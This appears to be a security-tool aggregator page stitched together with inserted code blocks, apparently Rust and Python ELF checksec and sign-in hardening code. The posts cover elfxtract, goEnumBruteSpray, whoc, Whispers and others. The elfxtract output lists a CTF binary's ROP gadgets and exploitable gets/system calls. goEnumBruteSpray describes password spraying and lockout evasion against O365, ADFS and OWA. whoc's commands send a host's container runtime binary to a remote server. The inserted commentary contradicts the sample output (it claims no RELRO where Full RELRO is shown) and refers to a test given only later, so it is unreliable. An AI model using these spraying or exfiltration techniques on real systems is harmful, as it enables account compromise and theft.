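fn u16_at(b: &[u8], o: usize) -> Option<u16> { b.get(o..o + 2).map(|s| u16::from_le_bytes(s.try_into().unwrap())) }
fn u32_at(b: &[u8], o: usize) -> Option<u32> { b.get(o..o + 4).map(|s| u32::from_le_bytes(s.try_into().unwrap())) }
fn u64_at(b: &[u8], o: usize) -> Option<u64> { b.get(o..o + 8).map(|s| u64::from_le_bytes(s.try_into().unwrap())) }

/// checksec-style verdicts for a little-endian ELF64 image; None if the bytes are not one.
pub fn analyze(elf: &[u8]) -> Option<Mitigations> {
    if elf.len() < 64 || &elf[..4] != b"\x7fELF" || elf[4] != 2 || elf[5] != 1 {
        return None;
    }
    let (phoff, phentsize, phnum) = (u64_at(elf, 32)? as usize, u16_at(elf, 54)? as usize, u16_at(elf, 56)? as usize);
    // Without a PT_GNU_STACK header the loader gives the process an executable stack.
    let (mut nx, mut has_relro, mut dynamic) = (false, false, None);
    for i in 0..phnum {
        let ph = phoff + i * phentsize;
        match u32_at(elf, ph)? {
            PT_GNU_STACK => nx = (u32_at(elf, ph + 4)? & PF_X) == 0,
            PT_GNU_RELRO => has_relro = true,
            PT_DYNAMIC => dynamic = Some((u64_at(elf, ph + 8)? as usize, u64_at(elf, ph + 32)? as usize)),
            _ => {}
        }
    }
    // Walk the dynamic table for immediate binding and library search paths.
    let (mut bind_now, mut rpath, mut runpath) = (false, false, false);
    if let Some((off, size)) = dynamic {
        let mut pos = off;
        while pos + 16 <= off + size {
            let (tag, val) = (u64_at(elf, pos)?, u64_at(elf, pos + 8)?);
            match tag {
                DT_NULL => break,
                DT_BIND_NOW => bind_now = true,
                DT_FLAGS => bind_now |= (val & DF_BIND_NOW) != 0,
                DT_FLAGS_1 => bind_now |= (val & DF_1_NOW) != 0,
                DT_RPATH => rpath = true,
                DT_RUNPATH => runpath = true,
                _ => {}
            }
            pos += 16;
        }
    }
    // Full RELRO = PT_GNU_RELRO segment plus immediate binding, so the GOT ends up read-only.
    let relro = match (has_relro, bind_now) {
        (false, _) => Relro::None,
        (true, false) => Relro::Partial,
        (true, true) => Relro::Full,
    };
    // ET_DYN is how checksec-style tools flag PIE (shared libraries are ET_DYN as well).
    Some(Mitigations { pie: u16_at(elf, 16)? == ET_DYN, nx, relro, rpath, runpath })
}

fn push_phdr(elf: &mut Vec<u8>, p_type: u32, p_flags: u32, offset: u64, size: u64) {
    elf.extend_from_slice(&p_type.to_le_bytes());
    elf.extend_from_slice(&p_flags.to_le_bytes());
    for v in [offset, 0, 0, size, size, 8] { elf.extend_from_slice(&v.to_le_bytes()); }
}

/// Constructed, non-runnable ELF64 image that carries only the headers the checks read.
pub fn build_sample_elf(pie: bool, exec_stack: bool, relro: Relro) -> Vec<u8> {
    let (phoff, phnum) = (64u64, 3u16);
    let mut dynamic: Vec<u64> = Vec::new();
    if relro == Relro::Full { dynamic.extend_from_slice(&[DT_FLAGS, DF_BIND_NOW]); }
    dynamic.extend_from_slice(&[DT_NULL, 0]);
    let dyn_bytes: Vec<u8> = dynamic.iter().flat_map(|v| v.to_le_bytes()).collect();
    let mut elf = vec![0u8; 64];
    elf[..4].copy_from_slice(b"\x7fELF");
    elf[4] = 2; elf[5] = 1; elf[6] = 1; // ELFCLASS64, ELFDATA2LSB, EV_CURRENT
    elf[32..40].copy_from_slice(&phoff.to_le_bytes());
    let e_type = if pie { ET_DYN } else { ET_EXEC };
    // e_type, e_machine (EM_X86_64), e_ehsize, e_phentsize, e_phnum
    for (off, val) in [(16usize, e_type), (18, 0x3e), (52, 64), (54, 56), (56, phnum)] {
        elf[off..off + 2].copy_from_slice(&val.to_le_bytes());
    }
    let stack_flags = if exec_stack { PF_R | PF_W | PF_X } else { PF_R | PF_W };
    push_phdr(&mut elf, PT_GNU_STACK, stack_flags, 0, 0);
    push_phdr(&mut elf, PT_DYNAMIC, PF_R | PF_W, phoff + u64::from(phnum) * 56, dyn_bytes.len() as u64);
    push_phdr(&mut elf, if relro == Relro::None { PT_LOAD } else { PT_GNU_RELRO }, PF_R, 0, 0);
    elf.extend_from_slice(&dyn_bytes); // lands exactly at the PT_DYNAMIC offset computed above
    elf
}

fn main() {
    println!("hardened: {:?}", analyze(&build_sample_elf(true, false, Relro::Full)));
    println!("weak:     {:?}", analyze(&build_sample_elf(false, true, Relro::None)));
}
```

The "weak" image reproduces the combination in the sample output further down (PIE off or on, NX disabled, no RELRO); the point of running such a check yourself is that NX and RELRO verdicts come from two different places, the program headers and the dynamic tags, and a tool that reads only one of them will report Partial RELRO for a binary linked with -z now.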

Installation

git clone https://github.com/AidenPearce369/elfxtract
cd elfxtract
chmod +x install.sh
./install.sh
pip install -r requirements.txt

Working

You can run elfxtract with any ELF along with -a to list all details from the ELF

$ python3 main.py --file programvuln -a

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************

> FILE INFO :

ELF Name : programvuln
ELF Type : ELF 64-bit LSB shared object
ELF Arch : x86-64
ELF SHA1 Hash : BuildID[sha1]=cf149d97ad1e895561080b1f5c317bc5bc1e8652

This binary is dynamically linked & not stripped

***************************************************************************

> SHARED OBJECT DEPENDENCY :

linux-vdso.so.1 (0x00007ffd525a4000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd610d93000)
/lib64/ld-linux-x86-64.so.2 (0x00007fd610fa1000)

***************************************************************************

> ELF SECURITY MITIGATIONS :

RELRO : Full RELRO
STACK CANARY : No Canary found
NX BIT : NX disabled
PIE : PIE enabled
RPATH : No RPATH
RUNPATH : No RUNPATH

***************************************************************************

> POSSIBLE STRINGS :

nth paddr vaddr len size section type string
――――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00002008 0x00002008 31 32 .rodata ascii You have bypassed this function
1 0x00002028 0x00002028 12 13 .rodata ascii cat flag.txt
2 0x00002035 0x00002035 15 16 .rodata ascii Enter your name
3 0x00002045 0x00002045 13 14 .rodata ascii Your name is

***************************************************************************

> RODATA HEXDUMP :

0x00002000 01000200 00000000 596f7520 68617665 ........You have
0x00002010 20627970 61737365 64207468 69732066 bypassed this f
0x00002020 756e6374 696f6e00 63617420 666c6167 unction.cat flag
0x00002030 2e747874 00456e74 65722079 6f757220 .txt.Enter your
0x00002040 6e616d65 00596f75 72206e61 6d652069 name.Your name i
0x00002050 732000 s .


***************************************************************************

> ELF ENTRY POINT :

The entry point of the ELF is at 0x10c0

***************************************************************************

> HEADER MEMORY MAP :

Type Offset VirtAddr PhysAddr
FileSiz MemSiz Flags Align
PHDR 0x0000000000000040 0x0000000000000040 0x0000000000000040
0x00000000000002d8 0x00000000000002d8 R 0x8
INTERP 0x0000000000000318 0x0000000000000318 0x0000000000000318
0x000000000000001c 0x000000000000001c R 0x1
[Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]
LOAD 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x00000000000006a8 0x00000000000006a8 R 0x1000
LOAD 0x0000000000001000 0x0000000000001000 0x0000000000001000
0x00000000000002b5 0x00000000000002b5 R E 0x1000
LOAD 0x0000000000002000 0x0000000000002000 0x0000000000002000
0x00000000000001c8 0x00000000000001c8 R 0x1000
LOAD 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000270 0x0000000000000278 RW 0x1000
DYNAMIC 0x0000000000002db0 0x0000000000003db0 0x0000000000003db0
0x00000000000001f0 0x00000000000001f0 RW 0x8
NOTE 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
NOTE 0x0000000000000358 0x0000000000000358 0x0000000000000358
0x0000000000000044 0x0000000000000044 R 0x4
GNU_PROPERTY 0x0000000000000338 0x0000000000000338 0x0000000000000338
0x0000000000000020 0x0000000000000020 R 0x8
GNU_EH_FRAME 0x0000000000002054 0x0000000000002054 0x0000000000002054
0x000000000000004c 0x000000000000004c R 0x4
GNU_STACK 0x0000000000000000 0x0000000000000000 0x0000000000000000
0x0000000000000000 0x0000000000000000 RWE 0x10
GNU_RELRO 0x0000000000002da0 0x0000000000003da0 0x0000000000003da0
0x0000000000000260 0x0000000000000260 R 0x1

***************************************************************************
[*] Loaded 14 cached gadgets for 'programvuln'

> ROP GADGETS :

0x1017 : add esp, 8;ret
0x1016 : add rsp, 8;ret
0x1221 : leave;ret
0x128c : pop r12;pop r13;pop r14;pop r15;ret
0x128e : pop r13;pop r14;pop r15;ret
0x1290 : pop r14;pop r15;ret
0x1292 : pop r15;ret
0x128b : pop rbp;pop r12;pop r13;pop r14;pop r15;ret
0x128f : pop rbp;pop r14;pop r15;ret
0x1193 : pop rbp;ret
0x1293 : pop rdi;ret
0x1291 : pop rsi;pop r15;ret
0x128d : pop rsp;pop r13;pop r14;pop r15;ret
0x101a : ret

***************************************************************************

> PLT TABLE :

__cxa_finalize : 0x1074
puts : 0x1084
system : 0x1094
printf : 0x10a4
gets : 0x10b4

***************************************************************************

> GOT TABLE :

_ITM_deregisterTMCloneTable : 0x3fd8
__libc_start_main : 0x3fe0
__gmon_start__ : 0x3fe8
_ITM_registerTMCloneTable : 0x3ff0
__cxa_finalize : 0x3ff8
puts : 0x3fb8
system : 0x3fc0
printf : 0x3fc8
gets : 0x3fd0

***************************************************************************

> FUNCTION TABLE :

__libc_csu_fini : 0x12a0
__libc_csu_init : 0x1230
win : 0x11a9
_start : 0x10c0
main : 0x11d6

***************************************************************************

> POSSIBLE USER DEFINED FUNCTIONS :

win : 0x11a9
main : 0x11d6

***************************************************************************

> ASSEMBLY AND DECOMPILED CODE :


[*] ASM - win :

┌ 45: sym.win ();
│ 0x000011a9 f30f1efa endbr64
│ 0x000011ad 55 push rbp
│ 0x000011ae 4889e5 mov rbp, rsp
│ 0x000011b1 488d3d500e00. lea rdi, str.You_have_bypassed_this_function ; 0x2008 ; "You have bypassed this function" ; const char *format
│ 0x000011b8 b800000000 mov eax, 0
│ 0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format)
│ 0x000011c2 488d3d5f0e00. lea rdi, str.cat_flag.txt ; 0x2028 ; "cat flag.txt" ; const char *string
│ 0x000011c9 b800000000 mov eax, 0
│ 0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)
│ 0x000011d3 90 nop
│ 0x000011d4 5d pop rbp
└ 0x000011d5 c3 ret

[*] DECOMPILED CODE - win :

void sym.win(void)

{
sym.imp.printf("You have bypassed this function");
sym.imp.system("cat flag.txt");
return;
}

[*] ASM - main :

; DATA XREF from entry0 @ 0x10e1
┌ 77: int main (int argc, char **argv, char **envp);
│ ; var char *s @ rbp-0x40
│ 0x000011d6 f30f1efa endbr64
│ 0x000011da 55 push rbp
│ 0x000011db 4889e5 mov rbp, rsp
│ 0x000011de 4883ec40 sub rsp, 0x40
│ 0x000011e2 488d3d4c0e00. lea rdi, str.Enter_your_name ; 0x2035 ; "Enter your name" ; const char *s
│ 0x000011e9 e892feffff call sym.imp.puts ; int puts(const char *s)
│ 0x000011ee 488d45c0 lea rax, [s]
│ 0x000011f2 4889c7 mov rdi, rax ; char *s
│ 0x000011f5 b800000000 mov eax, 0
│ 0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)
│ 0x000011ff 488d3d3f0e00. lea rdi, str.Your_name_is_ ; 0x2045 ; "Your name is " ; const char *format
│ 0x00001206 b800000000 mov eax, 0
│ 0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)
│ 0x00001210 488d45c0 lea rax, [s]
│ 0x00001214 4889c7 mov rdi, rax ; const char *s
│ 0x00001217 e864feffff call sym.imp.puts ; int puts(const char *s)
│ 0x0000121c b800000000 mov eax, 0
│ 0x00001221 c9 leave
└ 0x00001222 c3 ret

[*] DECOMPILED CODE - main :

// WARNING: [r2ghidra] Failed to match type char * for variable s to Decompiler type:

undefined8 main(void)

{
undefined8 s;

sym.imp.puts("Enter your name");
sym.imp.gets(&s);
sym.imp.printf("Your name is ");
sym.imp.puts(&s);
return 0;
}

***************************************************************************

> VULNERABLE FUNCTIONS :

Possible vulnerability locations - Command Execution

0x000011ce e8bdfeffff call sym.imp.system ; int system(const char *string)

Possible vulnerability locations - Format String

0x000011bd e8defeffff call sym.imp.printf ; int printf(const char *format)
0x0000120b e890feffff call sym.imp.printf ; int printf(const char *format)

Possible vulnerability locations - Buffer Overflow

0x000011fa e8b1feffff call sym.imp.gets ; char *gets(char *s)


***************************************************************************

You can also pass individual arguments to get only the information you need:

[email protected]:~/elfxtract$ python3 main.py -h

_____ _ ________ ___ _
| ___| | | ___\ \ / / | | |
| |__ | | | |_ \ V /| |_ _ __ __ _ ___| |_
| __|| | | _| / \| __| '__/ _` |/ __| __|
| |___| |____| | / /^\ \ |_| | | (_| | (__| |_
\____/\_____/\_| \/ \/\__|_| \__,_|\___|\__|

@aidenpearce369

***************************************************************************
usage: main.py [-h] -f FILE [-a] [-i] [-g] [--user-func] [--get-func GET_FUNC] [--asm-only]
[--decompiled-only] [-t]

optional arguments:
-h, --help show this help message and exit
-f FILE, --file FILE Path of the ELF
-a, --all Extract all info
-i, --info Displays basic info
-g, --gadgets Displays gadgets
--user-func Displays the details of user defined functions
--get-func GET_FUNC Displays the ASM & decompiled code of the given function
--asm-only Displays the ASM of ELF
--decompiled-only Displays the decompiled C code of ELF
-t, --tables Displays PLT, GOT & Function table

Updates

elfxtract is currently built for parsing PWN binaries.

New features for analysing system binaries will be added soon.

Auto-BOF and auto-ret2 exploit features will also be added.



goEnumBruteSpray - User Enumeration And Password Bruteforce On Azure, ADFS, OWA, O365 And Gather Emails On Linkedin

26 November 2021 at 11:30
By: Zion3R


The recommended module is o365 for user enumeration and password bruteforce / spray. Additional information can be retrieved to avoid account lockout, and to know whether the password is correct but expired, whether MFA is enabled, and so on.


Linkedin

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company is searched for on LinkedIn and all people working at that company are returned in the specified format.

The LinkedIn session cookie li_at is required.


SearchEngine

This module should be used to retrieve a list of email addresses before validating them through a user enumeration module. The company name is searched for on Google and Bing with a dork that finds people working at the company (site:linkedin.com/in+"%s"). The result titles are parsed to output email addresses in the specified format.



Azure

User enumeration

The Azure module is only available for enumerating the users of a tenant. The authentication request is made to https://autologon.microsoftazuread-sso.com; the detailed response shows whether the account does not exist, whether MFA is required, whether the account is locked, and so on.



ADFS

Passwords bruteforce / spray

The ADFS module is only available for bruteforcing or spraying a password. The authentication request is sent to https://<target>/adfs/ls/idpinitiatedsignon.aspx?client-request-id=<randomGUID>&pullStatus=0. An error message can inform the user if the password is expired.



O365

This module allows enumerating users and bruteforcing / spraying passwords.

User enumeration

Several modes are available: office, oauth2 and onedrive (not implemented yet). The office mode is recommended, as no authentication is attempted. Oauth2 can retrieve additional information through the AADSTS error code (MFA enabled, locked account, disabled account).



Passwords bruteforce / spray

As for user enumeration, two modes are available: oauth2 and autodiscover (not implemented yet). Oauth2 is the recommended mode, as it returns much more information thanks to the AADSTS error code.



OWA

This module allows enumerating users and bruteforcing / spraying passwords.

User enumeration

Enumeration is done with authentication requests. Authentication for a non-existent user takes longer than for a valid user. First, the average response time for an invalid user is calculated; then the response time of each authentication request is compared against it.



Passwords bruteforce / spray

Please note that no account lockout handling can be implemented, because no information about it is returned.



Credits

https://github.com/busterb/msmailprobe
https://github.com/0xZDH/o365spray/
https://github.com/xFreed0m/ADFSpray/
https://github.com/m8r0wn/CrossLinked



Nanobrok - Web Service For Control And Protect Your Android Device Remotely

25 November 2021 at 20:30
By: Zion3R


Web service written in Python to control and protect your Android device remotely.

The official app can be found on the PlayStore:


Overview

Nanobrok-Server is a powerful open-source web service for controlling and protecting your Android device. It is written in Python and offers a stable, secure connection to your Android device for remote protection and control.

Main Features

  • Maps the location of your device
  • Alert flag (Event it's lost or stolen)
  • Recorder Audio Mic
  • Remote File Transfer [PRO]
  • Network scanner [PRO]
  • and more!

Security features

We implemented some security features to try to protect your remote server. But remember that no method of transmission over the internet, or method of electronic storage, is 100% secure and reliable, and I cannot guarantee its absolute security.

  • CSRF token
  • Sign-in attempt block limit
  • X-Frame-Options
  • Same origin policy (SOP)
  • CORS flask implementation
  • HTTPS force redirect
  • API Header X-CSRFToken
  • Self Signed Certificate (CA)

We are always looking to implement more security features.
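As an added illustration of several of the listed features, and not Nanobrok's own code, the following standard-library Python shows a sign-in handler that forces a redirect to HTTPS, sends X-Frame-Options, binds the X-CSRFToken value to the session with an HMAC, and applies a sign-in attempt block limit over a sliding window. The request dictionary shape and the injectable clock are assumptions made for the demonstration; a real server would take these values from the HTTP request and its session store.

```python
import hashlib
import hmac
import secrets
import time
from collections import defaultdict, deque
from typing import Callable, Dict, List, Tuple

# Per-process secret for this demonstration; a deployment loads it from config.
SECRET_KEY = secrets.token_bytes(32)

# Browser-side defences from the feature list (HSTS is added only over HTTPS).
SECURITY_HEADERS: List[Tuple[str, str]] = [
    ("X-Frame-Options", "DENY"),
    ("X-Content-Type-Options", "nosniff"),
]


def make_csrf_token(session_id: str) -> str:
    """Derive the CSRF token from the session with an HMAC: it cannot be forged
    without SECRET_KEY and is useless against any other session."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, token: str) -> bool:
    return hmac.compare_digest(make_csrf_token(session_id), token or "")


class LoginLimiter:
    """Sign-in attempt block limit: refuse further attempts from a client after
    `limit` failures inside a sliding window of `window` seconds."""

    def __init__(self, limit: int = 5, window: float = 300.0,
                 now: Callable[[], float] = time.monotonic) -> None:
        self.limit, self.window, self.now = limit, window, now
        self.failures: Dict[str, deque] = defaultdict(deque)

    def is_blocked(self, client: str) -> bool:
        q = self.failures[client]
        cutoff = self.now() - self.window
        while q and q[0] < cutoff:  # drop failures that have aged out
            q.popleft()
        return len(q) >= self.limit

    def record_failure(self, client: str) -> None:
        self.failures[client].append(self.now())

    def reset(self, client: str) -> None:
        self.failures.pop(client, None)


def handle_login(req: dict, limiter: LoginLimiter,
                 check_password: Callable[[str, str], bool]
                 ) -> Tuple[str, List[Tuple[str, str]], bytes]:
    """Sign-in handler. `req` is a constructed request dict with the keys scheme,
    host, path, client, session_id, csrf_token (the X-CSRFToken header value),
    user and password. Returns (status, headers, body)."""
    headers = list(SECURITY_HEADERS)
    if req["scheme"] != "https":  # HTTPS force redirect
        headers.append(("Location", f"https://{req['host']}{req['path']}"))
        return "301 Moved Permanently", headers, b""
    headers.append(("Strict-Transport-Security", "max-age=31536000; includeSubDomains"))
    if limiter.is_blocked(req["client"]):
        return "429 Too Many Requests", headers, b"too many sign-in attempts"
    if not verify_csrf_token(req["session_id"], req.get("csrf_token", "")):
        return "403 Forbidden", headers, b"missing or invalid CSRF token"
    if not check_password(req["user"], req["password"]):
        limiter.record_failure(req["client"])
        return "401 Unauthorized", headers, b"invalid credentials"
    limiter.reset(req["client"])
    return "200 OK", headers, b"signed in"


if __name__ == "__main__":
    lim = LoginLimiter(limit=3, window=60)
    req = dict(scheme="https", host="nanobrok.example", path="/login",
               client="203.0.113.9", session_id="demo-session",
               csrf_token=make_csrf_token("demo-session"), user="u", password="wrong")
    for _ in range(4):
        print(handle_login(req, lim, lambda u, p: False)[0])
```

The limiter keys on the client address only; a deployment behind a proxy must take the client from a trusted forwarded header or the limit is trivially shared by everyone behind it.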

Supported platforms

  • Python: you need Python 3.7 or later to run Nanobrok-Server.

  • You can run localhost, VPS or as heroku app.

  • Operating System:

    • a recent version of Linux (we tested on Ubuntu 18.04 LTS);
    • please note: Windows is supported (not tested yet)

Installation & Documentation

Learn more in the wiki.

Contributing

See CONTRIBUTING.md for how to help out.

Community

on discord: https://discord.gg/gYjBryBu

License

Nanobrok is licensed under the Apache 2.0 license.

Made with by P0cL4bs Team


LOLBins - PyQT5 App For LOLBAS And GTFOBins

25 November 2021 at 11:30
By: Zion3R


PyQT app to list all Living Off The Land Binaries and Scripts for Windows from LOLBAS and Unix binaries that can be used to bypass local security restrictions in misconfigured systems from GTFOBins.

Windows


Linux



Redherd Framework -A Collaborative And Serverless Framework For Orchestrating A Geographically Distributed Group Of Assets

24 November 2021 at 20:30
By: Zion3R


RedHerd is a collaborative and serverless framework for orchestrating a geographically distributed group of assets capable of conducting simulated complex offensive cyberspace operations.

Getting Started

Take a look at the RedHerd documentation for instructions on how to get started with the framework.

Cite this work

If you use RedHerd Framework for your research activity, cite the following paper published by MDPI (Multidisciplinary Digital Publishing Institute) https://www.mdpi.com/2624-6120/2/4/38

Links

Below are some interesting links related to the project:

Changelog

Go to CHANGELOG to see all the version changes.

License

This project is under the MIT license.

Contact us

Feel free to contact us at this e-mail address:


Disclaimer

The provided contents and tools are for awareness and research purposes only. Our target audience is composed of those interested in learning about Ethical Hacking, Security, Penetration Testing and Red Teaming. We are not responsible for any inappropriate or illegal usage of both proposed material and discussed topics.

Funding

This is a non-profit project which received neither funding nor sponsorship.



Whoc - A Container Image That Extracts The Underlying Container Runtime

24 November 2021 at 11:30
By: Zion3R


A container image that extracts the underlying container runtime and sends it to a remote server. Poke at the underlying container runtime of your favorite CSP container platform!


How does it work?

As shown by runc CVE-2019-5736, traditional Linux container runtimes expose themselves to the containers they're running through /proc/self/exe. whoc uses this link to read the container runtime executing it.


Dynamic Mode

This is whoc's default mode, which works against dynamically linked container runtimes.

  1. The whoc image entrypoint is set to /proc/self/exe, and the image's dynamic linker (ld.so) is replaced with fake_ld.
  2. Once the image is run, the container runtime re-executes itself inside the container.
  3. Given the runtime is dynamically linked, the kernel loads our fake dynamic linker into the runtime process and passes execution to it.
  4. fake_ld obtains a file descriptor for the runtime binary by opening /proc/self/exe, and executes upload_runtime.
  5. upload_runtime reads the runtime binary from /proc/self/fd/<runtime-fd> and sends it to the configured remote server.



Wait-For-Exec Mode

For statically linked container runtimes, whoc comes in another flavor: whoc:waitforexec.

  1. upload_runtime is the image entrypoint, and runs as the whoc container PID 1.
  2. The user is expected to exec into the whoc container and invoke a file pointing to /proc/self/exe (e.g. docker exec whoc-ctr /proc/self/exe).
  3. Once the exec occurs, the container runtime re-executes itself inside the container.
  4. upload_runtime reads the runtime binary through /proc/<runtime-pid>/exe and sends it to the configured remote server.
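The two header checks that matter for the tools above can be done with a few lines of ELF parsing. The block below is an added example, not code from whoc or elfxtract: it walks the program headers of an ELF64 image to answer (a) whether the binary declares a PT_INTERP entry, i.e. is dynamically linked and so loads its ld.so from the filesystem it runs in, which is what decides between whoc's dynamic and wait-for-exec modes, and (b) whether its PT_GNU_STACK entry lacks the execute bit, which is how a checksec such as elfxtract's "ELF SECURITY MITIGATIONS" section decides the NX line (the programvuln dump earlier on this page shows GNU_STACK with RWE flags and, consistently, "NX disabled"). The sample image builder is constructed for the demonstration; only little-endian ELF64 is handled.

```python
import struct
import sys

# Constants from <elf.h>
ELF_MAGIC = b"\x7fELF"
ELFCLASS64, ELFDATA2LSB = 2, 1
ET_DYN, EM_X86_64 = 3, 62
PT_LOAD, PT_INTERP, PT_GNU_STACK = 1, 3, 0x6474E551
PF_X, PF_W, PF_R = 1, 2, 4

# Little-endian ELF64 file header (64 bytes) and program header (56 bytes).
EHDR64 = struct.Struct("<16sHHIQQQIHHHHHH")
PHDR64 = struct.Struct("<IIQQQQQQ")


def inspect_elf(data: bytes) -> dict:
    """Walk the program headers of a little-endian ELF64 image and report whether
    it needs a dynamic linker (PT_INTERP) and whether its stack is non-executable
    (PT_GNU_STACK present without PF_X), i.e. the NX line of a checksec."""
    if len(data) < EHDR64.size or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF image")
    (e_ident, _type, _machine, _version, _entry, e_phoff, _shoff, _flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, _shnum, _shstrndx) = EHDR64.unpack_from(data, 0)
    if e_ident[4] != ELFCLASS64 or e_ident[5] != ELFDATA2LSB:
        raise ValueError("only little-endian ELF64 is handled here")
    if e_phentsize != PHDR64.size:
        raise ValueError("unexpected program header entry size")
    interp = None
    gnu_stack_flags = None
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if off + PHDR64.size > len(data):
            raise ValueError("program header table truncated")
        p_type, p_flags, p_offset, _va, _pa, p_filesz, _memsz, _align = PHDR64.unpack_from(data, off)
        if p_type == PT_INTERP:  # path of the ld.so the kernel will map in
            interp = data[p_offset:p_offset + p_filesz].rstrip(b"\0").decode(errors="replace")
        elif p_type == PT_GNU_STACK:
            gnu_stack_flags = p_flags
    # A missing GNU_STACK entry leaves the stack executable, as does PF_X on it.
    nx_enabled = gnu_stack_flags is not None and not gnu_stack_flags & PF_X
    return {"dynamically_linked": interp is not None, "interpreter": interp,
            "nx_enabled": nx_enabled}


def build_sample_elf(dynamic: bool, exec_stack: bool) -> bytes:
    """Construct a minimal ELF64 image (headers only, no code) for demonstration."""
    interp_str = b"/lib64/ld-linux-x86-64.so.2\0"
    # (type, flags, offset, size, align)
    entries = [(PT_LOAD, PF_R | PF_X, 0, 0, 0x1000),
               (PT_GNU_STACK, PF_R | PF_W | (PF_X if exec_stack else 0), 0, 0, 0x10)]
    n = len(entries) + (1 if dynamic else 0)
    interp_off = EHDR64.size + n * PHDR64.size
    if dynamic:
        entries.insert(0, (PT_INTERP, PF_R, interp_off, len(interp_str), 1))
    e_ident = ELF_MAGIC + bytes([ELFCLASS64, ELFDATA2LSB, 1, 0]) + bytes(8)
    ehdr = EHDR64.pack(e_ident, ET_DYN, EM_X86_64, 1, 0x1000, EHDR64.size, 0, 0,
                       EHDR64.size, PHDR64.size, n, 0, 0, 0)
    phdrs = b"".join(PHDR64.pack(t, f, off, 0, 0, sz, sz, al) for t, f, off, sz, al in entries)
    return ehdr + phdrs + (interp_str if dynamic else b"")


if __name__ == "__main__":
    # Inspect a binary given on the command line, else the running interpreter.
    path = sys.argv[1] if len(sys.argv) > 1 else sys.executable
    with open(path, "rb") as fh:
        print(path, inspect_elf(fh.read(1 << 20)))
```

Run against a container runtime binary (for example the runc the file server receives in the local test above) it tells you whether the dynamic mode can apply at all; run against programvuln it reproduces the NX verdict elfxtract prints from the same GNU_STACK flags.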



Try Locally

You'll need docker and python3 installed. Clone the repository:

$ git clone git@github.com:twistlock/whoc.git

Set up a file server to receive the extracted container runtime:

$ cd whoc
$ mkdir -p stash && cd stash
$ ln -s ../util/fileserver.py fileserver
$ ./fileserver

From another shell, run the whoc image in your container environment of choice, for example Docker:

$ cd whoc
$ docker build -f Dockerfile_dynamic -t whoc:latest src # or ./util/build.sh
$ docker run --rm -it --net=host whoc:latest 127.0.0.1 # or ./util/run_local.sh

See that the file server received the container runtime. Since we run whoc under vanilla Docker, the received container runtime should be runc.

--net=host is only used in local tests so that the whoc container could easily reach the fileserver on the host via 127.0.0.1.


Help

Help for whoc's main binary, upload_runtime:

Usage: upload_runtime [options] <server_ip>

Options:
-p, --port Port of remote server, defaults to 8080
-e, --exec Wait-for-exec mode for static container runtimes, waits until an exec to the container occurred
-b, --exec-bin In exec mode, overrides the default binary created for the exec, default is /bin/enter
-a, --exec-extra-argument In exec mode, pass an additional argument to the runtime so it won't exit quickly
-r, --exec-readdir-proc In exec mode, instead of guessing the runtime pid (which gives whoc one shot of catching the runtime),
find the runtime by searching for new processes under '/proc'


Whispers - Identify Hardcoded Secrets In Static Structured Text

23 November 2021 at 20:30
By: Zion3R


"My little birds are everywhere, even in the North, they whisper to me the strangest stories." - Lord Varys

Whispers is a static code analysis tool designed for parsing various common data formats in search of hardcoded credentials and dangerous functions. Whispers can run in the CLI or you can integrate it in your CI/CD pipeline.


Detects
  • Passwords
  • API tokens
  • AWS keys
  • Private keys
  • Hashed credentials
  • Authentication tokens
  • Dangerous functions
  • Sensitive files

Supported Formats

Whispers is intended to be a structured text parser, not a code parser.

The following commonly used formats are currently supported:

  • YAML
  • JSON
  • XML
  • .npmrc
  • .pypirc
  • .htpasswd
  • .properties
  • pip.conf
  • conf / ini
  • Dockerfile
  • Dockercfg
  • Shell scripts
  • Python3

Python3 files are parsed as ASTs because of native language support.


Declaration & Assignment Formats

The following language files are parsed as text, and checked for common variable declaration and assignment patterns:

  • JavaScript
  • Java
  • Go
  • PHP

Special Formats
  • AWS credentials files
  • JDBC connection strings
  • Jenkins config files
  • SpringFramework Beans config files
  • Java Properties files
  • Dockercfg private registry auth files
  • Github tokens

Installation

From PyPI
pip3 install whispers

From GitHub
git clone https://github.com/Skyscanner/whispers
cd whispers
make install

Usage

CLI
whispers --help
whispers --info
whispers source/code/fileOrDir
whispers --config config.yml source/code/fileOrDir
whispers --output /tmp/secrets.yml source/code/fileOrDir
whispers --rules aws-id,aws-secret source/code/fileOrDir
whispers --severity BLOCKER,CRITICAL source/code/fileOrDir
whispers --exitcode 7 source/code/fileOrDir

Python
from whispers.cli import parse_args
from whispers.core import run

src = "tests/fixtures"
configfile = "whispers/config.yml"
args = parse_args(["-c", configfile, src])
for secret in run(args):
    print(secret)

Config

There are several configuration options available in Whispers. It’s possible to include/exclude results based on file path, key, or value. File path specifications are interpreted as globs. Keys and values accept regular expressions and several other parameters. There is a default configuration file built-in that will be used if you don't provide a custom one.

config.yml should have the following structure:

include:
  files:
    - "**/*.yml"

exclude:
  files:
    - "**/test/**/*"
    - "**/tests/**/*"
  keys:
    - ^foo
  values:
    - bar$

rules:
  starks:
    message: Whispers from the North
    severity: CRITICAL
    value:
      regex: (Aria|Ned) Stark
      ignorecase: True

The fastest way to tweak detection (i.e. remove false positives and unwanted results) is to copy the default config.yml into a new file, adapt it, and pass it as an argument to Whispers.

whispers --config config.yml --rules starks src/file/or/dir


Custom Rules

